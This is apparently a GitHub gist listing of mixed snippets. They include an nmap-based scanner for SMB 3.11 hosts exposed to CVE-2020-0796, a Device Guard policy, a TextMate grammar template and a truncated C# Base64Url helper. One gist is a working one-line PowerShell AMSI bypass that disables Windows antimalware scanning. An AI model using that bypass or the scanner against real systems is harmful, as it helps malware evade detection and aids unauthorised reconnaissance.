Skip to content

Instantly share code, notes, and snippets.

View Neo23x0's full-sized avatar

Florian Roth Neo23x0

View GitHub Profile
@nikallass
nikallass / check-smb-v3.11.sh
Created March 11, 2020 04:57
CVE-2020-0796. Scan HOST/CIDR with nmap script smb-protocols.nse and grep SMB version 3.11.
View check-smb-v3.11.sh
#!/bin/bash
if [ $# -eq 0 ]
then
echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR'
exit 1
fi
echo "Checking if there's SMB v3.11 in" $1 "..."
nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | replace 'Nmap scan report for' '@' | tr "@" "\n" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'
@mattifestation
mattifestation / BaseEnforcementPolicy.xml
Last active March 5, 2021 16:31
A Device Guard policy in enforcement mode that just works. It permits execution of only enough to boot the OS, run Windows code, and run Store apps.
View BaseEnforcementPolicy.xml
<?xml version="1.0" encoding="utf-8"?>
<SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy">
<VersionEx>10.0.0.0</VersionEx>
<PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID>
<PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID>
<Rules>
<Rule>
<Option>Enabled:Unsigned System Integrity Policy</Option>
</Rule>
<Rule>
@mattifestation
mattifestation / amsibypass.ps1
Created July 17, 2017 22:54
Compels AmsiScanBuffer/AmsiScanString to return E_INVALIDARG
View amsibypass.ps1
[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141)
@DamnedScholar
DamnedScholar / language-sampleGrammar.cson
Last active January 25, 2023 20:14
Grammar boilerplate with annotations.
View language-sampleGrammar.cson
# TextMate tutorial: http://manual.macromates.com/en/language_grammars
# Regex to convert keys to unquoted: '(include|match|captures|begin|end|beginCaptures|endCaptures|name|patterns|0|1|2|3|4|5|6|7|8|9|comment|fileTypes|scopeName|repository|contentName|firstLineMatch|foldingStartMarker|foldingStopMarker)':
scopeName: 'source.<scope>' # <scope> should be a short, unique indicator for the language ("js", "php", "c", etc.)
name: '<name>' # The title that will show up in grammar selection and on your status bar.
fileTypes: [ # An array of file extensions.
'txt'
'exif'
]
@gerektoolhy
gerektoolhy / Base64UrlExtensions
Last active December 15, 2017 15:37
Base64UrlExtensions as specified by rfc4648 ((https://tools.ietf.org/html/rfc4648#section-5)
View Base64UrlExtensions
public static class Base64UrlExtensions
{
/// <summary>
/// Encodes string to base64url, as specified by rfc4648 (https://tools.ietf.org/html/rfc4648#section-5)
/// </summary>
/// <returns></returns>
public static string ToBase64Url(this string str)
{
// TODO - adds reference to System.Web
if (str == null)